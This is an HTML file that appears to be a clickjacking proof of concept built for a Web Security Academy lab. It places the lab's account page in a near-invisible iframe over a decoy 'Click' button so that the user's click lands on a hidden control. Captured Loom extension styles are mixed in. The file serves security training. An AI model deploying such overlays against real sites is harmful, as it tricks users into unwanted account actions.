<html class="js-focus-visible" data-js-focus-visible=""><head>
  <style>
    #target_website {
      position:relative;
      width:400px;
      height:400px;
      opacity:0.00001;
      z-index:2;
      }
    #decoy_website {
      position:absolute;
      width:400px;
      height:400px;
      z-index:1;
      }
      #evil {
    position: absolute;
    width: 340px;
    top:160px;
    left: 20px;
}
  </style>
<style type="text/css">
@font-face {
font-weight: 400;
font-style:  normal;
font-family: 'Circular-Loom';

src: url('https://cdn.loom.com/assets/fonts/circular/CircularXXWeb-Book-cd7d2bcec649b1243839a15d5eb8f0a3.woff2') format('woff2');
}

@font-face {
font-weight: 500;
font-style:  normal;
font-family: 'Circular-Loom';

src: url('https://cdn.loom.com/assets/fonts/circular/CircularXXWeb-Medium-d74eac43c78bd5852478998ce63dceb3.woff2') format('woff2');
}

@font-face {
font-weight: 700;
font-style:  normal;
font-family: 'Circular-Loom';

src: url('https://cdn.loom.com/assets/fonts/circular/CircularXXWeb-Bold-83b8ceaf77f49c7cffa44107561909e4.woff2') format('woff2');
}

@font-face {
font-weight: 900;
font-style:  normal;
font-family: 'Circular-Loom';

src: url('https://cdn.loom.com/assets/fonts/circular/CircularXXWeb-Black-bf067ecb8aa777ceb6df7d72226febca.woff2') format('woff2');
}</style></head>

<body>
  <div id="decoy_website">
  <button id="evil">Click</button>
  </div>
  <iframe id="target_website" src="https://aceb1fdc1f288ddc80786a3a000700ea.web-security-academy.net/account">
  </iframe>

</body><loom-container id="lo-engage-ext-container"><div></div><loom-shadow classname="resolved"></loom-shadow></loom-container></html>